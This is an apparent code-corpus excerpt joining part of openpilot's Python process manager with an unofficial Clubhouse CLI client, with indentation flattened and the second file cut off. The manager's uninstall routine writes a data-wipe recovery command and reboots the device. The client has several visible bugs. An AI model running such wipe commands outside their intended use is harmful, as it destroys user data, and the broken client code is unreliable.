signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat)
except (OSError, IOError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
is_neos = os.path.isfile("/init.qcom.rc")
neos_update_required = False
if is_neos:
version = int(open("/VERSION").read()) if os.path.isfile("/VERSION") else 0
revision = int(open("/REVISION").read()) if version >= 10 else 0 # Revision only present in NEOS 10 and up
neos_update_required = version < 10 or (version == 10 and revision != 3)
if neos_update_required:
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
updater_dir = os.path.join(BASEDIR, "installer", "updater")
manifest_path = os.path.realpath(os.path.join(updater_dir, "update.json"))
os.system(os.path.join(updater_dir, "updater") + " file://" + manifest_path)
raise Exception("NEOS outdated")
elif os.path.isdir("/data/neoupdate"):
from shutil import rmtree
rmtree("/data/neoupdate")
unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import subprocess
import traceback
from multiprocessing import Process
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./start.py"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"params_learner": ("selfdrive/locationd", ["./params_learner"]),
"visiond": ("selfdrive/visiond", ["./visiond"]),
"sensord": ("selfdrive/sensord", ["./start_sensord.py"]),
"gpsd": ("selfdrive/sensord", ["./start_gpsd.py"]),
"updated": "selfdrive.updated",
"athena": "selfdrive.athena.athenad",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'updated',
'athena',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'params_learner',
'visiond',
'proclogd',
'ubloxd',
'gpsd',
'deleter',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def launcher(proc):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# terminate the zmq context since we forked
import zmq
zmq.Context.instance().term()
# exec the process
mod.main()
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
# can't install the crash handler becuase sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock(service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
params = Params()
logger_dead = False
while 1:
# get health of board, log this in "thermal"
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.18:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check the status of all processes, did any of them die?
running_list = [" running %s %s" % (p, running[p]) for p in running]
cloudlog.debug('\n'.join(running_list))
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.keys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path).read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app]).read()).hexdigest()
cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
def manager_update():
if os.path.exists(os.path.join(BASEDIR, "vpn")):
cloudlog.info("installing vpn")
os.system(os.path.join(BASEDIR, "vpn", "install.sh"))
update_apks()
def manager_prepare():
# build cereal first
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['plannerd']
del managed_processes['radard']
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process) # pylint: disable=no-member
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("IsFcwEnabled") is None:
params.put("IsFcwEnabled", "1")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadRawEnabled") is None:
params.put("IsUploadRawEnabled", "1")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsDriverMonitoringEnabled") is None:
params.put("IsDriverMonitoringEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
cli.py
|
"""
cli.py
Sample CLI Clubhouse Client
RTC: For voice communication
"""
import os
import sys
import threading
import configparser
import keyboard
from termcolor import colored
from rich.table import Table
from rich.console import Console
from clubhouse.clubhouse import Clubhouse
# Set some global variables
try:
import agorartc
RTC = agorartc.createRtcEngineBridge()
eventHandler = agorartc.RtcEngineEventHandlerBase()
RTC.initEventHandler(eventHandler)
# 0xFFFFFFFE will exclude Chinese servers from Agora's servers.
RTC.initialize(Clubhouse.AGORA_KEY, None, agorartc.AREA_CODE_GLOB & 0xFFFFFFFE)
# Enhance voice quality
if RTC.setAudioProfile(
agorartc.AUDIO_PROFILE_MUSIC_HIGH_QUALITY_STEREO,
agorartc.AUDIO_SCENARIO_GAME_STREAMING
) < 0:
print("[-] Failed to set the high quality audio profile")
except ImportError:
RTC = None
def set_interval(interval):
""" (int) -> decorator
set_interval decorator
"""
def decorator(func):
def wrap(*args, **kwargs):
stopped = threading.Event()
def loop():
while not stopped.wait(interval):
ret = func(*args, **kwargs)
if not ret:
break
thread = threading.Thread(target=loop)
thread.daemon = True
thread.start()
return stopped
return wrap
return decorator
def write_config(user_id, user_token, user_device,username,name, filename='setting.ini'):
""" (str, str, str, str) -> bool
Write Config. return True on successful file write
"""
config = configparser.ConfigParser()
config["Account"] = {
"user_device": user_device,
"user_id": user_id,
"name": name,
"username": username,
"user_token": user_token,
}
with open(filename, 'w') as config_file:
config.write(config_file)
return True
def read_config(filename='setting.ini'):
""" (str) -> dict of str
Read Config
"""
config = configparser.ConfigParser()
config.read(filename)
if "Account" in config:
return dict(config['Account'])
return dict()
def process_onboarding(client):
""" (Clubhouse) -> NoneType
This is to process the initial setup for the first time user.
"""
print("=" * 30)
print("Welcome to Clubhouse!\n")
print("The registration is not yet complete.")
print("Finish the process by entering your legal name and your username.")
print("WARNING: THIS FEATURE IS PURELY EXPERIMENTAL.")
print(" YOU CAN GET BANNED FOR REGISTERING FROM THE CLI ACCOUNT.")
print("=" * 30)
while True:
user_realname = input("[.] Enter your legal name (John Smith): ")
user_username = input("[.] Enter your username (elonmusk1234): ")
user_realname_split = user_realname.split(" ")
if len(user_realname_split) != 2:
print("[-] Please enter your legal name properly.")
continue
if not (user_realname_split[0].isalpha() and
user_realname_split[1].isalpha()):
print("[-] Your legal name is supposed to be written in alphabets only.")
continue
if len(user_username) > 16:
print("[-] Your username exceeds above 16 characters.")
continue
if not user_username.isalnum():
print("[-] Your username is supposed to be in alphanumerics only.")
continue
client.update_name(user_realname)
result = client.update_username(user_username)
if not result['success']:
print(f"[-] You failed to update your username. ({result})")
continue
result = client.check_waitlist_status()
if not result['success']:
print("[-] Your registration failed.")
print(f" It's better to sign up from a real device. ({result})")
continue
print("[-] Registration Complete!")
print(" Try registering by real device if this process pops again.")
break
def print_channel_list(client, max_limit=100):
""" (Clubhouse) -> NoneType
Print list of channels
"""
# Get channels and print out
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("Option")
table.add_column("channel_name", style="cyan", justify="right")
table.add_column("speaker_count")
table.add_column("topic")
channels = client.get_channels()['channels']
i = 0
for channel in channels:
i += 1
if i > max_limit:
break
_option = ""
_option += "\xEE\x85\x84" if channel['is_social_mode'] or channel['is_private'] else ""
table.add_row(
str(i),
str(_option),
str(channel['channel']),
str(int(channel['num_speakers'])),
str(channel['topic']),
)
console.print(table)
def chat_main(client):
""" (Clubhouse) -> NoneType
Main function for chat
"""
max_limit = 8000
channel_speaker_permission = False
_wait_func = None
_ping_func = None
def _request_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Raise hands for permissions
"""
if not channel_speaker_permission:
client.audience_reply(channel_name, True, False)
_wait_func = _wait_speaker_permission(client, channel_name, user_id)
print("[/] You've raised your hand. Wait for the moderator to give you the permission.")
@set_interval(30)
def _ping_keep_alive(client, channel_name):
""" (str) -> bool
Continue to ping alive every 30 seconds.
"""
client.active_ping(channel_name)
return True
@set_interval(10)
def _wait_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Function that runs when you've requested for a voice permission.
"""
# Get some random users from the channel.
_channel_info = client.get_channel(channel_name)
if _channel_info['success']:
for _user in _channel_info['users']:
if _user['user_id'] != user_id:
user_id = _user['user_id']
break
# Check if the moderator allowed your request.
res_inv = client.accept_speaker_invite(channel_name, user_id)
if res_inv['success']:
print("[-] Now you have a speaker permission.")
print(" Please re-join this channel to activate a permission.")
return False
return True
while True:
# Choose which channel to enter.
# Join the talk on success.
user_id = client.HEADERS.get("CH-UserID")
print_channel_list(client, max_limit)
channel_name = input("[.] Enter channel_name: ")
if str(channel_name) == "Exit":
break
channel_info = client.join_channel(channel_name)
if not channel_info['success']:
# Check if this channel_name was taken from the link
channel_info = client.join_channel(channel_name, "link", "e30=")
if not channel_info['success']:
print(f"[-] Error while joining the channel ({channel_info['error_message']})")
continue
# List currently available users (TOP 20 only.)
# Also, check for the current user's speaker permission.
channel_speaker_permission = False
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("name")
table.add_column("is_speaker")
table.add_column("is_moderator")
users = channel_info['users']
i = 0
for user in users:
i += 1
if i > max_limit:
break
table.add_row(
str(i),
str(user['user_id']),
str(user['name']),
str(user['username']),
str(user['is_speaker']),
str(user['is_moderator']),
)
# Check if the user is the speaker
if user['user_id'] == int(user_id):
channel_speaker_permission = bool(user['is_speaker'])
console.print(table)
# Check for the voice level.
if RTC:
token = channel_info['token']
RTC.joinChannel(token, channel_name, "", int(user_id))
else:
print("[!] Agora SDK is not installed.")
print(" You may not speak or listen to the conversation.")
# Activate pinging
client.active_ping(channel_name)
_ping_func = _ping_keep_alive(client, channel_name)
_wait_func = None
# Add raise_hands key bindings for speaker permission
# Sorry for the bad quality
if not channel_speaker_permission:
if sys.platform == "darwin": # OSX
_hotkey = "9"
elif sys.platform == "win32": # Windows
_hotkey = "ctrl+shift+h"
print(f"[*] Press [{_hotkey}] to raise your hands for the speaker permission.")
keyboard.add_hotkey(
_hotkey,
_request_speaker_permission,
args=(client, channel_name, user_id)
)
input(colored("[*] Press [Enter] to quit conversation.\n",'yellow'))
keyboard.unhook_all()
# Safely leave the channel upon quitting the channel.
if _ping_func:
_ping_func.set()
if _wait_func:
_wait_func.set()
if RTC:
RTC.leaveChannel()
client.leave_channel(channel_name)
def user_authentication(client):
""" (Clubhouse) -> NoneType
Just for authenticating the user.
"""
result = None
while True:
user_phone_number = input("[.] Please enter your phone number. (+818043217654) > ")
result = client.start_phone_number_auth(user_phone_number)
if not result['success']:
print(f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
result = None
while True:
verification_code = input("[.] Please enter the SMS verification code (1234, 0000, ...) > ")
result = client.complete_phone_number_auth(user_phone_number, verification_code)
if not result['success']:
print(f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
# print(result)
user_id = result['user_profile']['user_id']
user_token = result['auth_token']
user_device = client.HEADERS.get("CH-DeviceId")
username = result['user_profile']['username']
name = result['user_profile']['name']
write_config(user_id, user_token, user_device, username,name)
print("[.] Writing configuration file complete.")
if result['is_waitlisted']:
print("[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Authenticate user first and start doing something
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
if result['is_onboarding']:
process_onboarding(client)
return
def invite(client):
try:
_res = client.me()
num_invites = _res['num_invites']
print("[!] invites : " + str(num_invites))
if num_invites == 0:
print("Not have Invite")
print("=" * 30)
return
numberPhone = input(colored("[.] Enter Phone number for invite: ",'cyan'))
if str(numberPhone) == "Exit":
return
_res = client.invite_to_app(None,numberPhone,"Hello")
print(_res)
print("=" * 30)
except:
return invite(client)
return
def inviteWaitlist(client):
try:
_res = client.get_actionable_notifications()
print("[!] Let them in : " + str(_res['count']))
if _res['count'] == 0:
print("=" * 30)
return
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("Noti_id", style="cyan", justify="right")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("type")
table.add_column("name")
users = _res['notifications']
i = 0
for user in users:
i += 1
if i > _res['count']:
break
table.add_row(
str(i),
str(user['actionable_notification_id']),
str(user['user_profile']['user_id']),
str(user['user_profile']['username']),
str(user['type']),
str(user['user_profile']['name']),
)
console.print(table)
user_id = input(colored("[.] Enter No. for invite: ",'cyan'))
if str(user_id) == "Exit":
return
_res = client.invite_from_waitlist(int(users[int(user_id) - 1]['user_profile']['user_id']))
print(_res)
_res = client.ignore_actionable_notification(int(users[int(user_id) - 1]['actionable_notification_id']))
print(_res)
print("=" * 30)
except:
return inviteWaitlist(client)
return
def Suggested_follows_all(client):
_res = client.get_suggested_follows_all()
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("name")
table.add_column("bio")
users = _res['users']
i = 0
for user in users:
i += 1
if i > _res['count']:
break
table.add_row(
str(i),
str(user['user_id']),
str(user['username']),
str(user['name']),
str(user['bio']),
)
console.print(table)
print("=" * 30)
return
def getProfile(client):
_user_id = input(colored("Enter user_id for get profile: ",'cyan'))
try:
if str(user_id) == "Exit":
return
_res = client.get_profile(int(_user_id))
_user = _res['user_profile']
print("=" * 30)
print("[!] ID : " + str(_user['user_id']))
print("[!] name : " + str(_user['name']))
print("[!] displayname : " + str(_user['displayname']))
print("[!] username : @" + str(_user['username']))
print()
print("[!] followers : " + str(_user['num_followers']) +", following : "+ str(_user['num_following']))
print("[!] follows me : " + str(_user['follows_me']))
print()
print("[!] twitter : " + str(_user['twitter']))
print("[!] instagram : " + str(_user['instagram']))
print()
if _user['invited_by_user_profile'] != None:
print("[!] invited : [" + str(_user['invited_by_user_profile']['user_id'])+"] "+ str(_user['invited_by_user_profile']['name']))
print()
print("[!] bio : ")
print(str(_user['bio']))
print()
print("=" * 30)
_Following = input(colored("[.] Following ? [Y/n]: ",'cyan'))
if _Following == "Y":
_res = client.follow(_user['user_id'])
print(_res)
print("=" * 30)
except:
return getProfile(client)
return
def addFollow(client):
user_id = input(colored("[.] Enter user_id for Follow: ",'cyan'))
try:
if str(user_id) == "Exit":
return
_res = client.follow(user_id)
print(_res)
print("=" * 30)
except Exception:
return addFollow(client)
return
def getFollowing(client):
try:
user_id = input(colored("[.] Enter user_id for get Following: ",'cyan'))
if str(user_id) == "Exit":
return
_res = client.get_following(user_id, page_size=100, page=1)
users = _res['users']
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("name")
table.add_column("username")
table.add_column("bio")
i = 0
for user in users:
i += 1
if i > int(len(users)):
break
table.add_row(
str(i),
str(user['user_id']),
str(user['name']),
str(user['username']),
str(user['bio']),
)
console.print(table)
print("=" * 30)
except Exception:
return getFollowing(client)
return
def searchUsers(client):
try:
query = input(colored("[.] Search User : ",'cyan'))
if str(query) == "Exit":
return
_res = client.search_users(query,False,False,False)
users = _res['users']
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("name")
table.add_column("username")
table.add_column("bio")
i = 0
for user in users:
i += 1
if i > int(len(users)):
break
table.add_row(
str(i),
str(user['user_id']),
str(user['name']),
str(user['username']),
str(user['bio']),
)
console.print(table)
print("=" * 30)
except Exception:
return searchUsers(client)
return
def getFollowers(client):
try:
user_id = input(colored("[.] Enter user_id for get Followers: ",'cyan'))
if str(user_id) == "Exit":
print("=" * 30)
return
_res = client.get_followers(user_id, page_size=100, page=1)
users = _res['users']
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("name")
table.add_column("username")
table.add_column("bio")
i = 0
for user in users:
i += 1
if i > int(len(users)):
break
table.add_row(
str(i),
str(user['user_id']),
str(user['name']),
str(user['username']),
str(user['bio']),
)
console.print(table)
print("=" * 30)
except Exception:
return nameSetting(client)
return
def getOnlineFriends(client):
_res = client.get_online_friends()
# print(_res)
users = _res['users']
print(colored("[!] Online Friends : ",'yellow') + str(len(users)))
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("name")
table.add_column("username")
table.add_column("active")
table.add_column("topic")
table.add_column("channel", style="cyan", justify="right")
i = 0
for user in users:
i += 1
_topic = ""
_channel = ""
if i > int(len(users)):
break
if len(user) > 5:
_topic = user['topic']
_channel = user['channel']
table.add_row(
str(i),
str(user['user_id']),
str(user['name']),
str(user['username']),
str(user['last_active_minutes']),
str(_topic),
str(_channel),
)
console.print(table)
print("=" * 30)
return
def nameSetting(client):
print(colored(" [1] Update Username", 'yellow'))
print(colored(" [2] Update Name", 'yellow'))
print(colored(" [3] Update Display name", 'yellow'))
print(colored(" [Exit] back to main menu", 'yellow'))
print("=" * 30)
_menu = int(input(colored("[.] Enter Menu [1-3]: ",'cyan')))
if str(_menu) == "Exit":
print("=" * 30)
return
if _menu == 1:
_input = input("[.] Enter Username : ")
if str(_input) == "Exit":
print("=" * 30)
return
_res = client.update_username(str(_input))
elif _menu == 2:
_input = input("[.] Enter Name : ")
if str(_input) == "Exit":
print("=" * 30)
return
res = client.update_name(str(_input))
elif _menu == 3:
_input = input("[.] Enter Display : ")
if str(_input) == "Exit":
print("=" * 30)
return
res = client.update_displayname(str(_input))
else:
return nameSetting(client)
print(res)
print("=" * 30)
return
def Profile(client):
_res = client.me()
num_invites = _res['num_invites']
user_config = read_config()
user_id = user_config.get('user_id')
name = user_config.get('name')
username = user_config.get('username')
print("[!] ID : " + user_id)
print("[!] name : " + name)
print("[!] username : @" + username)
print("[!] invites : " + str(num_invites))
print("=" * 30)
return
def searchClubs(client):
_input = input("[.] Search clubs : ")
if str(_menu) == "Exit":
print("=" * 30)
return
try:
_res = client.search_clubs(_input,False,False,False)
users = _res['clubs']
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("club_id", style="cyan", justify="right")
table.add_column("name")
table.add_column("num_followers")
table.add_column("num_members")
table.add_column("is_member")
table.add_column("is_follower")
i = 0
for user in users:
i += 1
if i > int(len(users)):
break
table.add_row(
str(i),
str(user['club_id']),
str(user['name']),
str(user['num_followers']),
str(user['num_members']),
str(user['is_member']),
str(user['is_follower']),
)
console.print(table)
print("=" * 30)
except Exception:
return searchClubs(client)
return
def getTopics(client):
try:
_res = client.get_all_topics()
users = _res['topics']
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("id", style="cyan", justify="right")
table.add_column("title")
ct = 0
i = 0
for user in users:
i += 1
ct += 1
if i > int(len(users)):
break
table.add_row(
str(ct),
str("-"),
str(user['title']),
)
usersj = user['topics']
j = 0
for userj in usersj:
j += 1
ct += 1
if j > int(len(usersj)):
break
table.add_row(
str(ct),
str(userj['id']),
str(userj['title']),
)
console.print(table)
print("=" * 30)
except Exception:
return
return
def addInterest(client):
try:
_input = input("[.] Add club or topic [c/t]: ")
if _input == "c":
topic_id = input("[.] Enter topic_id : ")
_res = client.add_user_topic(None,topic_id)
elif _input == "t":
club_id = input("[.] Enter club_id : ")
_res = client.add_user_topic(club_id,None)
elif _input == "Eixt":
return
print(_res)
print("=" * 30)
except Exception:
return addInterest(client)
return
def rmInterest(client):
try:
_input = input("[.] Remove club or topic [c/t]: ")
if _input == "c":
topic_id = input("[.] Enter topic_id : ")
_res = client.remove_user_topic(None,topic_id)
elif _input == "t":
club_id = input("[.] Enter club_id : ")
_res = client.remove_user_topic(club_id,None)
elif _input == "Eixt":
return
print(_res)
print("=" * 30)
except Exception:
return rmInterest(client)
return
def menu(client):
while True:
print(colored(" [0] Notifications", 'yellow'))
print(colored(" [1] Room Chat", 'yellow'))
print(colored(" [2] Search Users", 'yellow'))
print(colored(" [3] View Following", 'yellow'))
print(colored(" [4] View Followers", 'yellow'))
print(colored(" [5] Follow", 'yellow'))
print(colored(" [6] Invite to App", 'yellow'))
print(colored(" [7] Invite From Waitlist", 'yellow'))
print(colored(" [8] Suggested follows all", 'yellow'))
print(colored(" [9] Name Setting", 'yellow'))
print(colored(" [10] Profile", 'yellow'))
print(colored(" [11] Online Friends", 'yellow'))
print(colored(" [12] Get Profile", 'yellow'))
print(colored(" [13] Get Clubs", 'yellow'))
print(colored(" [14] Get Topics", 'yellow'))
print(colored(" [15] Add your're Interest", 'yellow'))
print(colored(" [16] Remove your're Interest", 'yellow'))
print("=" * 30)
_menu = int(input(colored("[.] Enter Menu [0-16]: ", 'cyan')))
print("=" * 30)
if _menu == 0:
noTi(client)
elif _menu == 1:
chat_main(client)
elif _menu == 2:
searchUsers(client)
elif _menu == 3:
getFollowing(client)
elif _menu == 4:
getFollowers(client)
elif _menu == 5:
addFollow(client)
elif _menu == 6:
invite(client)
elif _menu == 7:
inviteWaitlist(client)
elif _menu == 8:
